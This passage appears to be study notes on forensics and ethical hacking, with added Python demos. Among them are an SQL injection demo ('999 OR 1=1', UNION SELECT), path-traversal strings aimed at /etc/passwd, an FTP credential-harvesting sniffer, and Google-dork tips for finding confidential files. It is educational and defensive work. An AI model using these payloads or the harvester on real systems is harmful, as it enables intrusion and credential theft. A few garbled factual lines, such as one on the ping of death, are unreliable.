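                                    (image.find(JPEG_MAGIC, pos), "jpeg")) if o != -1]
        if not hits:
            break
        start, kind = min(hits)          # earliest header wins
        if kind == "png":
            end = image.find(PNG_END, start)
            if end != -1:
                end += len(PNG_END) + 4  # include the IEND CRC
        else:
            end = image.find(JPEG_END, start + len(JPEG_MAGIC))
            if end != -1:
                end += len(JPEG_END)
        if end == -1:                    # header without a trailer: truncated, skip it
            pos = start + 1
            continue
        found.append((kind, start, image[start:end]))
        pos = end
    return found


def make_png() -> bytes:
    """Build a minimal, valid 1x1 greyscale PNG (constructed sample)."""
    def chunk(ctype: bytes, data: bytes) -> bytes:
        crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
        return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)
    idat = zlib.compress(b"\x00\x00")    # filter byte + one pixel
    return PNG_MAGIC + chunk(b"IHDR", ihdr) + chunk(b"IDAT", idat) + chunk(b"IEND", b"")


FILLER = bytes(range(256)) * 4           # 1024 bytes standing in for old, unrelated data


def make_image() -> bytes:
    """Constructed 'unallocated space': filler, a deleted PNG, filler, a deleted JPEG,
    filler, and a PNG header with no IEND (partially overwritten, must be skipped)."""
    jpeg = JPEG_MAGIC + b"\xe0" + b"JFIF-data" * 10 + JPEG_END
    return FILLER + make_png() + FILLER + jpeg + FILLER + PNG_MAGIC + b"truncated"


if __name__ == "__main__":
    for kind, offset, data in carve(make_image()):
        print(f"{kind:5s} at offset {offset:6d}, {len(data)} bytes")
```

Run it against a real image with `carve(open("disk.img", "rb").read())`; the offsets it reports are the evidence-relevant detail, since they place the recovered file inside the original medium. The JPEG trailer search is deliberately naive (the first FF D9 after the header), which is the kind of false boundary a production carver guards against by parsing the format.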
The Role of Back-up in Data Recovery
Many factors affect back-up:
 Storage costs are decreasing: The cost per megabyte of primary (online)
storage has fallen dramatically over the past several years and
continues to do so as disk drive technologies advance.
 Systems have to be online continuously: Because systems must be
continuously online, the dilemma becomes that you can no longer take
files offline long enough to perform backup.
 The role of backup has changed: The role of backup now includes the
responsibility for recovering user errors and ensuring that good data
has been saved and can quickly be restored.
Conventional Tape Back-up in Today’s Market
 A typical tape management system consists of a dedicated workstation
with the front-end interfaced to the network and the backend
controlling a repository of tape devices. The media server runs tape
management software. It can administer backup devices throughout an
enterprise and can run continuous parallel backups and restores.
 An alternative to tape backup is to physically replicate or mirror all data
and keep two copies online at all times. Because the cost of primary
storage is falling, this is not as cost-prohibitive as it once was. The
advantage is that the data does not have to be restored, so there are
no issues with immediate data availability.
 Network Back-up: Network backup creates network performance
problems. Using the production network to carry backup data, as well
as for normal user data access, can severely overburden today’s busy
network resources.
 Offline Backup: Offline backup affects data accessibility. Host
processors must be quiescent during the backup. Backup is not host-
independent, nor is it non disruptive to normal data access.
 Live Backup: Live backups allow data access during the backup process
but affect performance. Many database vendors offer live backup
features. The downside to the live backup is that it puts a tremendous
burden on the host.
 Mirroring: Mirroring doesn’t protect against user error and replication
of bad data. Fully replicated online data sounds great, albeit at twice
the cost per megabyte of a single copy of online data.
New Architectures and Techniques are required
 Backup at extremely high speed, with host-processor independence of
the underlying file structures supporting the data, is required. Recovery
must be available at the file level. The time that systems are offline for
back-up must be eliminated.
 Remote hot recovery sites are needed for immediate resumption of
data access. Backup of critical data is still required to ensure against
data errors and user errors.
 To achieve effective backup and recovery, the decoupling of data from
its storage space is needed.
 It is necessary to develop techniques to journal modified pages, so that
journaling can be invoked within the primary storage device, without
host intervention.
 Part of the primary storage area must be set aside for data to be
backed up. This area must be as large as the largest backup block (file,
logical volume, etc.)
7. Explain the working of digital Evidences with example?
Digital evidence is information stored or transmitted in binary form that
may be relied on in court. It can be found on a computer hard drive, a
mobile phone, among other places. Digital evidence is commonly
associated with electronic crime, or e-crime, such as child pornography
or credit card fraud. However, digital evidence is now used to
prosecute all types of crimes, not just e-crime.
For example, suspects' e-mail or mobile phone files might contain
critical evidence regarding their intent, their whereabouts at the time
of a crime and their relationship with other suspects. In 2005, for
example, a floppy disk led investigators to the BTK serial killer who had
eluded police capture since 1974 and claimed the lives of at least 10
victims.
Ethical Hacking
Part A
1. What are the phases of viruses?
a. Dormant Phase: At this stage the virus is idle. It is activated by some
action or event such as a date, a time or the presence of another program.
b. Propagation Phase: In this phase the virus places copies of itself into
other programs or system areas on the disk.
c. Triggering Phase: An event activates the virus to carry out the function it
was written for.
d. Execution Phase: In this phase the virus performs its actual function, which
may be harmless or destructive.
2. Explain SQL injection attacks?
SQL injection is an attack in which the attacker makes use of unvalidated
user input to enter arbitrary data or SQL commands. Malicious queries are
constructed and, when executed by the backend database, produce unintended
results. The attacker needs knowledge of the backend database and must use
different strings to construct malicious queries and submit them to the
target.
For example, with an item number taken from user input:
SELECT item_name, item_description FROM item WHERE item_no = 999 (normal query)
SELECT item_name, item_description FROM item WHERE item_no = 999 OR 1=1
(the input "999 OR 1=1" injected into the existing query; OR 1=1 is true for
every row, so the WHERE clause no longer filters anything)
3. What is Foot printing?
Footprinting is the part of the reconnaissance process used to gather as much
information as possible about a target computer system or network.
Footprinting can be either passive or active.
Example: browsing a company’s public website is passive footprinting, whereas
attempting to gain access to sensitive information by interacting with the
target’s systems is active footprinting. During this phase the attacker can
collect the following information:
 Domain name
 IP address
 Namespace
4. How Dos attack involves hacking?
A DoS attack is used to deny legitimate users access to a resource, such as
a website, a network or e-mail, or to make it extremely slow. This type of
attack is usually carried out by hitting the target resource, such as a web
server, with too many requests at the same time, so that the server fails to
respond to all of them. The effect is either to crash the server or to slow
it down.
5. Write a short note on spoofing?
A spoofing attack happens when a malicious party successfully
impersonates another user or device. Attackers typically use spoofing
to gain unauthorized access to a system or to sensitive information.
Spoofing attacks may also be used to launch attacks against other
network hosts or to spread malware. There are several major
types of spoofing, including:
 IP address spoofing
 ARP spoofing
 DNS server spoofing
 Email spoofing
6. What is Batch file programming?
Batch file programming is a way of telling a computer to do things simply by
creating a batch file: a list of commands you can write in a single Notepad
window and execute as a single file.
How to write a batch file?
Step 1: Open your text editor. Batch file programming is really about writing
commands; Notepad, WordPad, etc. are suitable text editors.
Step 2: Begin writing code. The code is essentially the same as what you type
at the command prompt. A few commands are as follows:
i. ipconfig: displays network configuration such as the IP address (and,
with /all, the MAC address).
ii. start [website]: opens the specified website in your browser.
iii. rem: used to put comments or remarks in your code.
iv. pause: halts the script so that the output can be read before it continues.
v. echo: displays text in the command prompt.
vi. %%a: the loop variable of a for command; for example, for %%a in (*)
refers to every file in the current folder, one at a time.
Part B
1. Explain Google Hacking Methods with example?
Google Hacking is the method to access information that’s publicly
available, but not intended for public distribution. Using certain
intelligent search techniques, one can land unexpected results on
Google search page. Google hacking involves using publicly available
search engines to access publicly available information that almost
certainly was not intended for public distribution.
The information accessed using Google Hacking:
 Personal and financial info.
 User ID, computer account logins, passwords.
 Private, or proprietary company data.
 Sensitive government information.
 Flaws in websites and servers.
Common Google Hacking techniques:
Search using file types, keywords and site type:
Many websites and organisations store their financial, personnel and similar
data in Microsoft Excel format. To look for sensitive information belonging
to, say, a South African company, restrict the search to spreadsheets (Google’s
filetype: operator) and to the company’s domain or country (the site: operator),
and don’t forget to include keywords like Confidential, Budget, etc.
Use stock words and phrases: Along with file types like Excel, Word or
PowerPoint, you are also advised to use stock words and phrases like
do not distribute, confidential, proprietary, not for distribution, etc.
Misconfigured web servers: Google’s index very often contains directory
listings that were never intended to be on the web. In Google hacking, these
servers provide a rich set of information.
Numrange search: The NSA describes the numrange search as one of the
“scariest searches available through Google”. It uses two numbers separated
by two dots and no spaces (for example 1000..2000) and matches any number in
that range; a user can combine it with search keywords and other search
options.
2. Explain any four port scanning methods?
Ping Scan: The simplest port scans are ping scans. A ping is an Internet
Control Message Protocol (ICMP) echo request; you are looking for ICMP echo
replies, which indicate that the target is alive. A ping scan is an automated
blast of many ICMP echo requests to different targets to see who responds.
Administrators usually block ping either on the firewall or on the router. It’s
quick and easy to turn this functionality off and make it impossible to scout
the network this way. However, ping is a good troubleshooting tool, and
turning it off makes tracking down network problems a little more difficult.
SYN (TCP Half-Open) scan: The scanner sends a SYN segment to each port and
watches the reply. A SYN-ACK means the port is open; the scanner then answers
with an RST instead of completing the handshake, which is why the scan is
called half-open. An RST reply means the port is closed, but there is a live
computer there. No response indicates the SYN is being filtered on the
network. A list of SYN-ACK replies is a quick way for an attacker to find the
next potential target.
TCP Connect:
This port scanning technique is basically the same as the TCP Half-Open scan,
but instead of leaving the target hanging, the port scanner completes the
TCP connection and then closes it.
It’s not as popular a technique as the TCP Half-Open. First, you have to send
at least one more packet per port, which increases the amount of noise you are
making on the network. Second, since you complete the connection with the
target, the listening application accepts it and may log it, so you might trip
an alarm that the Half-Open scan wouldn’t.
UDP: UDP is the other transport protocol, and some standard services (DNS,
SNMP and DHCP, for example) use UDP ports instead of TCP ports. When you run a
UDP port scan, you send either an empty datagram or a protocol-specific
payload to each port, depending on your use case. An ICMP port unreachable
reply means the port is closed; silence means the port is open or filtered,
which is what makes UDP scanning slow and ambiguous.
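Added example, not code from these notes: a TCP connect scanner in Python that produces the three outcomes described above (open, closed, filtered) from the result of the handshake. It scans the loopback interface against a listener it opens itself, so the port numbers are chosen by the OS at run time and no real host is probed.

```python
# TCP connect scan in pure Python against a listener on the loopback interface.
# Added example, not from these notes: the open port is a socket the script itself
# opens on 127.0.0.1, so nothing on a real network is touched.
import errno
import socket
import threading
from typing import Dict, Iterable, Tuple


def start_listener() -> Tuple[socket.socket, int]:
    """Open one listening TCP port chosen by the OS (the constructed target)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    return srv, srv.getsockname()[1]


def pick_closed_port() -> int:
    """Bind and immediately release a port: nothing listens there, so a connect
    gets an RST (ECONNREFUSED)."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]


def probe(host: str, port: int, timeout: float = 0.5) -> str:
    """Full three-way handshake followed by an immediate close.
    Connect succeeds (SYN-ACK came back)  -> open
    ECONNREFUSED (the host sent RST)      -> closed, but the host is alive
    No answer within the timeout          -> filtered (something dropped the SYN)"""
    try:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            rc = s.connect_ex((host, port))
    except OSError:
        return "filtered"
    if rc == 0:
        return "open"
    if rc == errno.ECONNREFUSED:
        return "closed"
    return "filtered"


def connect_scan(host: str, ports: Iterable[int], timeout: float = 0.5,
                 workers: int = 32) -> Dict[int, str]:
    """Probe the ports with a small thread pool and return {port: state}."""
    queue = list(ports)
    results: Dict[int, str] = {}
    lock = threading.Lock()

    def worker() -> None:
        while True:
            with lock:
                if not queue:
                    return
                port = queue.pop()
            state = probe(host, port, timeout)
            with lock:
                results[port] = state

    threads = [threading.Thread(target=worker) for _ in range(min(workers, len(queue)))]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return results


def demo() -> Dict[str, str]:
    """Stand up one open and one closed local port, scan both, tear down."""
    srv, open_port = start_listener()
    closed_port = pick_closed_port()
    try:
        found = connect_scan("127.0.0.1", [open_port, closed_port])
    finally:
        srv.close()
    return {"open_port": found[open_port], "closed_port": found[closed_port]}


if __name__ == "__main__":
    print(demo())
```

Because `probe` completes the handshake, every open port it finds is an accepted connection that the service (and its logs) will see, which is exactly the noise the text says a half-open scan avoids; a half-open scan needs raw sockets and root, which is why tools like nmap need privileges for it.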
3. Discuss in detail any four DOS attack techniques?
a. Ping of death: The ping command is usually used to test the
availability of a network resource. It works by sending small data
packets to the network resource. An IP packet can be at most 65,535
bytes long; a ping of death sends fragments that reassemble to a
larger packet than that. Since the packet is larger than the target’s
TCP/IP stack can handle, the server can freeze, reboot or crash.
b. Smurf attack: This type of attack uses a large amount of Internet
Control Message Protocol (ICMP) ping traffic aimed at an internet
broadcast address. The source IP address is spoofed to that of the
intended victim, so every host on the broadcast network sends its reply
to the victim.
Since a single broadcast address can cover up to around 255 hosts, a
Smurf attack amplifies a single ping up to 255 times. The effect of
this is to slow down or saturate the victim’s network.
In short, a Smurf attack is one in which a malicious user utilises the
broadcast address of a vulnerable network by sending spoofed
packets, resulting in the flooding of the targeted IP address.
c. Buffer Overflow: A buffer is a temporary storage location in RAM
that is used to hold data so that the CPU can manipulate it before
writing it back to disk. Buffers have a size limit. This type of attack
loads the buffer with more data than it can hold. This causes the
buffer to overflow and corrupt the data (and program state) next to it.
Example: sending an e-mail with an attachment whose file name is 256
characters long to a client that reserved space for a shorter name.
d. SYN attack: SYN is short for Synchronize. This type of attack
takes advantage of the three-way handshake used to establish a
TCP connection. A SYN attack works by flooding the victim with
incomplete SYN messages, i.e. SYNs whose handshake is never completed.
This causes the victim machine to allocate memory resources that are
never used and to deny access to legitimate users.
4. Write down any four types of attacks?
a. SQL Injection attack:
SQL injection is an attack in which the attacker makes use of unvalidated
user input to enter arbitrary data or SQL commands. Malicious queries are
constructed and, when executed by the backend database, produce unintended
results. The attacker needs knowledge of the backend database and must use
different strings to construct malicious queries and submit them to the
target.
For example, with an item number taken from user input:
SELECT item_name, item_description FROM item WHERE item_no = 999 (normal query)
SELECT item_name, item_description FROM item WHERE item_no = 999 OR 1=1
(the input "999 OR 1=1" injected into the existing query; OR 1=1 is true for
every row)
The types of SQL injection are as follows:
 Error based SQL injection (the database’s error messages leak information)
 Union based SQL injection (a UNION SELECT appends the attacker’s own query
to the result)
 Blind SQL injection (no data or errors are shown; the attacker infers results
from true/false behaviour or timing)
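The following is an added example, not code from these notes, that runs the queries above against an in-memory SQLite database. The item table, its is_public column and the two sample rows are constructed for the demonstration. It shows the tautology and the union-based form from the list beside the parameterised query that stops both, and it illustrates the SQL injection answer in Part A question 2 as well.

```python
# Vulnerable string-built query beside a parameterised one, run against an in-memory
# SQLite database. Added example, not from these notes; the item table and the is_public
# column are assumptions made so that the injection has something worth bypassing.
import sqlite3
from typing import List, Tuple


def setup_db() -> sqlite3.Connection:
    """Constructed sample data: one public item and one that must never be shown."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE item (item_no INTEGER, item_name TEXT, item_description TEXT, is_public INTEGER);"
        "INSERT INTO item VALUES (999, 'Widget', 'A public widget', 1);"
        "INSERT INTO item VALUES (1000, 'Prototype', 'Internal, not for sale', 0);"
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, item_no: str) -> List[Tuple[str, str]]:
    """The notes' pattern: user text is concatenated into the SQL, so whatever the
    user types is parsed as part of the statement."""
    sql = ("SELECT item_name, item_description FROM item "
           "WHERE is_public = 1 AND item_no = " + item_no)
    return conn.execute(sql).fetchall()


def lookup_safe(conn: sqlite3.Connection, item_no: str) -> List[Tuple[str, str]]:
    """Reject anything that is not a number, then bind the value as a parameter;
    the database receives it as data and never as SQL."""
    if not item_no.isdigit():
        raise ValueError("item_no must be numeric")
    sql = ("SELECT item_name, item_description FROM item "
           "WHERE is_public = 1 AND item_no = ?")
    return conn.execute(sql, (int(item_no),)).fetchall()


if __name__ == "__main__":
    db = setup_db()
    print(lookup_vulnerable(db, "999"))                                    # normal query
    print(lookup_vulnerable(db, "999 OR 1=1"))                             # tautology: every row
    print(lookup_vulnerable(db, "999 UNION SELECT name, sql FROM sqlite_master"))  # union-based
    print(lookup_safe(db, "999"))
```

Note why the tautology works here: AND binds tighter than OR, so `is_public = 1 AND item_no = 999 OR 1=1` is evaluated as `(... AND ...) OR 1=1`, and the access-control condition is silently discarded. The union-based input reads the schema out of `sqlite_master`, which is how an attacker without prior "knowledge of the backend database" obtains it.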
b. DoS attack (Denial of Service):
A DoS attack is used to deny legitimate users access to a resource, such as
a website, a network or e-mail, or to make it extremely slow. This type of
attack is usually carried out by hitting the target resource, such as a web
server, with too many requests at the same time, so that the server fails to
respond to all of them. The effect is either to crash the server or to slow
it down. Common forms are:
 Flooding attack
 Ping of death
 Smurf attack
 Buffer overflow
c. Sniffing:
Sniffing is the process of monitoring and capturing all the packets
passing through a given network using sniffing tools. Sniffers are used
by network and system administrators to monitor and troubleshoot
network traffic.
Attackers use sniffers to capture data packets containing sensitive
information such as passwords and account information.
Sniffers can be hardware or software installed on a system.
Types of Sniffing:
 Active Sniffing: This is sniffing through a switch. A switch is a
point-to-point network device that regulates the flow of data between its
ports by actively tracking the MAC address seen on each port, so other
hosts’ traffic does not normally reach the sniffer; the attacker has to
inject traffic (for example ARP spoofing or MAC flooding) to receive it,
which is why it is called active.
 Passive Sniffing: This is sniffing through a hub. Any traffic that is
passing through a non-switched or unbridged network segment can be seen by
all the machines on the segment, so the sniffer only has to listen.
d. Password attack:
One should always take care to use a strong password to defend one’s
accounts from potential attackers. A strong password has the following
attributes:
 Contains at least 8 characters.
 A mix of letters, numbers and special characters.
 A combination of small and capital letters.
Common password attacks:
 Dictionary attack: The attacker uses a predefined list of words from a
dictionary and tries each one as the password. If the password is weak, a
dictionary attack can crack it fast.
 Hybrid dictionary attack: Uses a set of dictionary words combined with
extensions (appended digits, years, symbols and the like). Crunch is a
wordlist generator in which you can specify a standard character set.
 Brute force attack: The attacker tries all possible combinations of
letters, numbers, special characters and small and capital letters to break
the password.
5. Examine different forms of privacy attacks?
Here the attacker uses various automated tools which are freely
available on the internet. Some examples are as follows:
a. Trojan: A Trojan, typically a RAT (Remote Administration Tool), enables
the attacker to execute various software and hardware instructions on the
target system. It has two parts:
i. Server part: installed on the victim’s computer.
ii. Client part: installed on the attacker’s system; this part gives
complete control over the target computer.
b. Key logger: A tool that records all the keystrokes made by the victim
and secretly sends the log to an e-mail address previously set up by the
attacker.
c. Spyware: A spyware utility is a malicious program that spies on the
activities of the victim and passes the recorded information to the
attacker without the victim’s consent. Most spyware monitors and
records the victim’s internet usage habits.
Typically a spyware tool is carried in a host .exe file or a utility file.
If the victim downloads and executes the infected .exe file, the spyware
becomes active on the victim’s system.
d. Sniffers: Sniffers were originally developed as tools for debugging or
troubleshooting network problems. An Ethernet-based sniffer works with a
network card in promiscuous mode to capture and save the data packets
sent across the network.
A sniffer can turn out to be quite dangerous: if an attacker manages to
install one on your system or on the network’s router, all the
information passing through, including passwords and company business,
is lost.
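Added example (not code from these notes) for the sniffing descriptions in question 4(c) and question 5(d): a Python decoder for captured Ethernet/IPv4/TCP frames that walks the headers, extracts the application payload and harvests an FTP USER/PASS login from it, which is the kind of data the text says an attacker is after. The frames, addresses and credentials are constructed inline; no capture interface or real traffic is involved.

```python
# Decoding a captured Ethernet/IPv4/TCP frame and pulling a cleartext login out of
# it, which is what a sniffer does once it has the bytes. Added example, not from
# these notes; the frames are constructed inline (the FTP USER/PASS exchange and the
# addresses are made up), so no capture interface is needed.
import struct
from dataclasses import dataclass
from typing import List, Optional, Tuple

ETHERTYPE_IPV4 = 0x0800
PROTO_TCP = 6


@dataclass
class Packet:
    src_mac: str
    dst_mac: str
    src_ip: str
    dst_ip: str
    src_port: int
    dst_port: int
    flags: int
    payload: bytes


def parse_frame(frame: bytes) -> Optional[Packet]:
    """Walk the headers: 14-byte Ethernet, IPv4 of IHL*4 bytes, TCP of data-offset*4
    bytes; whatever is left is application data. Returns None for non-IPv4/TCP."""
    if len(frame) < 14 + 20 + 20:
        return None
    dst_mac, src_mac = frame[0:6], frame[6:12]
    if struct.unpack("!H", frame[12:14])[0] != ETHERTYPE_IPV4:
        return None
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4
    total_len = struct.unpack("!H", ip[2:4])[0]
    if ip[9] != PROTO_TCP:
        return None
    tcp = ip[ihl:total_len]
    sport, dport = struct.unpack("!HH", tcp[0:4])
    data_off = (tcp[12] >> 4) * 4
    return Packet(
        src_mac=":".join(f"{b:02x}" for b in src_mac),
        dst_mac=":".join(f"{b:02x}" for b in dst_mac),
        src_ip=".".join(str(b) for b in ip[12:16]),
        dst_ip=".".join(str(b) for b in ip[16:20]),
        src_port=sport, dst_port=dport, flags=tcp[13], payload=tcp[data_off:],
    )


def harvest_credentials(frames: List[bytes]) -> List[Tuple[str, str, str]]:
    """Pair FTP USER and PASS lines sent to port 21 (assumption: FTP only) and
    return (server, user, password) triples: the attacker's actual goal."""
    creds, user = [], None
    for frame in frames:
        pkt = parse_frame(frame)
        if pkt is None or pkt.dst_port != 21:
            continue
        for line in pkt.payload.decode("ascii", "replace").splitlines():
            if line.startswith("USER "):
                user = line[5:]
            elif line.startswith("PASS ") and user is not None:
                creds.append((pkt.dst_ip, user, line[5:]))
                user = None
    return creds


def build_frame(src_ip: str, dst_ip: str, sport: int, dport: int, payload: bytes) -> bytes:
    """Assemble a frame as a hub or mirror port would deliver it. Checksums are left
    at zero because the frame is never put on the wire."""
    eth = bytes.fromhex("001122334455") + bytes.fromhex("66778899aabb") + struct.pack("!H", ETHERTYPE_IPV4)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + 20 + len(payload), 0, 0, 64, PROTO_TCP, 0,
                     bytes(int(o) for o in src_ip.split(".")), bytes(int(o) for o in dst_ip.split(".")))
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 5 << 4, 0x18, 8192, 0, 0)  # PSH|ACK
    return eth + ip + tcp + payload


SAMPLE_CAPTURE = [  # constructed: an FTP login and an unrelated HTTP request
    build_frame("10.0.0.5", "10.0.0.20", 40000, 21, b"USER alice\r\n"),
    build_frame("10.0.0.5", "10.0.0.20", 40000, 21, b"PASS hunter2\r\n"),
    build_frame("10.0.0.5", "10.0.0.20", 40001, 80, b"GET / HTTP/1.1\r\n"),
]

if __name__ == "__main__":
    print(harvest_credentials(SAMPLE_CAPTURE))
```

The decoder is the part that is the same whether the frames come from a hub (passive sniffing), from a switch after ARP spoofing (active sniffing) or from a pcap file; the defence the example implies is that nothing the parser can read should have been sent in cleartext in the first place (FTPS or SFTP instead of FTP).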
6. Explain Input validation attacks in detail?
An input validation attack is any malicious action against a computer system
that involves manually entering strange information into a normal user
input field. It takes place when an attacker purposely enters information
into a system or application with the intention of breaking system
functionality.
Types of input validation attack:
 Buffer Overflow Attack: The attacker sends more data than the program has
set aside memory to hold. The excess overwrites adjacent memory, so the
network service or computer stops responding, or the attacker takes control
of the memory the overflow reaches.
Examples: stack overflow, format string attacks.
 Canonicalization: This attack exploits the many different ways in which a
file or directory path can be written. It targets pages that use template
files or reference alternate files on the web server. The basic form of the
attack is to move outside of the web document root (for example with ../
sequences or their encoded equivalents) in order to access system files.
This functionality is reached from the URL and is not limited to any one
programming language or web server.
Changing a file directory path, that is, the digital permission of access to
parts of a computer, in order to reach a path the attacker should not reach,
lets the attacker steal sensitive information or make unapproved changes.
 Cross site Scripting (XSS): This attack involves placing a malicious link in
a plausible place; the link points to a normal website with a valid URL but
carries a dangerous script in its parameters. An unsuspecting visitor trusts
the site they are on and has no idea the page contains malicious activity.
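Added example, not code from these notes, for the canonicalization bullet above: the vulnerable path join beside a resolver that first reduces the input to one canonical spelling (percent-decoding until stable, NUL bytes, backslashes, ../ segments) and then checks that the result is still inside the document root. The WEB_ROOT value and the sample paths are assumptions, and POSIX path functions are used so the result is the same on any OS.

```python
# Canonicalisation (path traversal) check: the vulnerable join beside a hardened
# resolver. Added example, not from these notes; WEB_ROOT and the sample paths are
# assumptions, and pure-POSIX path functions are used so the result is the same on
# any OS.
import posixpath
from urllib.parse import unquote

WEB_ROOT = "/var/www/html"  # assumed document root


def naive_resolve(user_path: str) -> str:
    """Vulnerable: joins whatever it was given. The normpath call stands in for what
    the kernel does when it opens the path, which is how ../ escapes the root."""
    return posixpath.normpath(posixpath.join(WEB_ROOT, user_path.lstrip("/")))


def canonicalise(user_path: str) -> str:
    """Reduce every spelling of a path to one form: percent-decode until stable
    (catches double encoding), reject NUL bytes, treat backslashes as separators,
    then collapse '.' and '..' segments."""
    decoded = user_path
    for _ in range(3):                       # bounded: %252e -> %2e -> '.'
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    if "\x00" in decoded:
        raise ValueError("NUL byte in path")
    decoded = decoded.replace("\\", "/")
    return posixpath.normpath(posixpath.join(WEB_ROOT, decoded.lstrip("/")))


def safe_resolve(user_path: str) -> str:
    """Hardened: canonicalise first, then prove the result is still inside WEB_ROOT.
    The containment check, not the decoding, is what actually stops the attack."""
    full = canonicalise(user_path)
    if full != WEB_ROOT and not full.startswith(WEB_ROOT + "/"):
        raise ValueError(f"path escapes web root: {user_path!r}")
    return full


def is_blocked(user_path: str) -> bool:
    """True when safe_resolve rejects the path."""
    try:
        safe_resolve(user_path)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    for p in ["images/logo.png", "../../../etc/passwd", "%2e%2e/%2e%2e/%2e%2e/etc/passwd",
              "%252e%252e/%252e%252e/%252e%252e/etc/passwd", "..\\..\\..\\etc\\passwd"]:
        verdict = "blocked" if is_blocked(p) else safe_resolve(p)
        print(f"{p:45s} naive -> {naive_resolve(p):28s} safe -> {verdict}")
```

The order matters: decode, normalise, then compare. A blacklist of the string "../" applied before decoding misses `%2e%2e/` and `..\`, and one applied after a single decode misses `%252e%252e/`, which is why the check is on the final resolved path rather than on the input.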
7. Analyze different DDoS Attack types?
A Distributed Denial of Service (DDoS) attack is an attempt to make an
online service or a website unavailable by overloading it with huge
floods of traffic generated from multiple sources.
DDoS attacks can be broadly categorized into three categories:
 Volume-based Attacks
 Protocol Attacks
 Application Layer Attacks
a. Volume-based Attacks: Volume-based attacks include TCP floods,
UDP floods, ICMP floods, and other spoofed packet floods. These are
also called Layer 3 & 4 Attacks. Here, an attacker tries to saturate the
bandwidth of the target site. The attack magnitude is measured
in Bits per Second (bps).
i. UDP Flood: A UDP flood sends numerous UDP packets to random ports on a
remote host, port 53 (DNS) being a frequent target. For each packet the host
checks for an application listening on that port and, finding none, replies
with an ICMP destination unreachable message; at high volume this exhausts
the host. Specialized firewalls can be used to filter out or block
malicious UDP packets.
ii. ICMP Flood: This is similar to UDP flood and used to flood a
remote host with numerous ICMP Echo Requests. This type of
attack can consume both outgoing and incoming bandwidth and a
high volume of ping requests will result in overall system
slowdown.
iii. HTTP Flood: The attacker sends HTTP GET and POST requests to a
targeted web server in a large volume which cannot be handled
by the server and leads to denial of additional connections from
legitimate clients.
iv. Amplification Attack: The attacker makes a request that
generates a large response which includes DNS requests for large
TXT records and HTTP GET requests for large files like images,
PDFs, or any other data files.
b. Protocol Attacks: Protocol attacks include SYN floods, Ping of Death,
fragmented packet attacks, Smurf DDoS, etc. This type of attack
consumes actual server resources and other resources like firewalls
and load balancers. The attack magnitude is measured in Packets per
Second.
i. DNS flood: DNS floods are used for attacking both the
infrastructure and a DNS application to overwhelm a target
system and consume all its available network bandwidth.
ii. SYN Flood: The attacker sends TCP connection requests faster
than the targeted machine can process them, causing network
saturation. Administrators can tweak TCP stacks to mitigate the
effect of SYN floods.
iii. Ping of death: The ping command is usually used to test the
availability of a network resource. It works by sending small
data packets to the network resource. The TCP/IP protocol
allows 65,536 bytes as a Mac limit in the server. Since the data
packets are larger than the server can handle, the server can
freeze, reboot or crash.
c. Application Layer Attacks: Application Layer Attacks include
Slowloris, zero-day DDoS attacks, DDoS attacks that target
Apache, Windows or OpenBSD vulnerabilities and more. Here the
goal is to crash or exhaust the web server. The attack magnitude is
measured in Requests per Second.
i. Application Attack: This is also called Layer 7 Attack, where the
attacker makes excessive log-in, database-lookup, or search
requests to overload the application. It is really difficult to detect
Layer 7 attacks because they resemble legitimate website traffic.
ii. NTP Amplification: The attacker exploits publicly accessible
Network Time Protocol (NTP) servers to overwhelm the targeted
server with User Datagram Protocol (UDP) traffic, sending small
requests with the victim’s spoofed source address so that the much
larger replies go to the victim.
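Added example, not code from these notes, covering the SYN flood in question 3(d) and in (b)(ii) above: the detection logic a defender would run over a per-second packet summary, flagging a service when SYNs arrive in volume and almost none of the handshakes are completed. The traffic records and the thresholds are constructed assumptions; the thresholds in particular have to be tuned to the real baseline of the service being watched.

```python
# SYN-flood detection over a per-second packet summary. Added example, not from
# these notes: the traffic records are constructed inline, and the thresholds
# (50 SYNs in a second with at most 20 % of handshakes completed) are assumptions
# to be tuned to the real baseline of the service being watched.
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, Iterable, List, Tuple

SYN, ACK = 0x02, 0x10


@dataclass(frozen=True)
class Rec:
    ts: float      # seconds since capture start
    src: str
    dst: str
    dport: int
    flags: int     # TCP flag bits


def syn_flood_report(records: Iterable[Rec], window: float = 1.0, min_syns: int = 50,
                     max_completion: float = 0.2) -> Dict[Tuple[str, int], dict]:
    """For each (dst, dport) and each window, count SYN-only segments and bare ACKs
    (the client's third handshake packet). Real clients complete most handshakes;
    a flood, usually from spoofed sources, leaves them half-open, so the completion
    ratio collapses. Returns the busiest window per service and whether it looks
    like a flood."""
    buckets = defaultdict(lambda: {"syns": 0, "acks": 0, "sources": set()})
    for r in records:
        b = buckets[(r.dst, r.dport, int(r.ts // window))]
        if r.flags & SYN and not r.flags & ACK:
            b["syns"] += 1
            b["sources"].add(r.src)
        elif r.flags == ACK:
            b["acks"] += 1
    report: Dict[Tuple[str, int], dict] = {}
    for (dst, dport, _), b in buckets.items():
        completion = b["acks"] / b["syns"] if b["syns"] else 1.0
        entry = {"syns": b["syns"], "acks": b["acks"], "sources": len(b["sources"]),
                 "flood": b["syns"] >= min_syns and completion <= max_completion}
        if (dst, dport) not in report or entry["syns"] > report[(dst, dport)]["syns"]:
            report[(dst, dport)] = entry
    return report


def sample_records() -> List[Rec]:
    """Constructed traffic: 20 normal clients completing handshakes to 10.0.0.20:80 in
    the first second, then 300 SYNs from 250 spoofed sources with no follow-up ACKs,
    plus a handful of normal connections to 10.0.0.21:443 at the same time."""
    recs = []
    for i in range(20):
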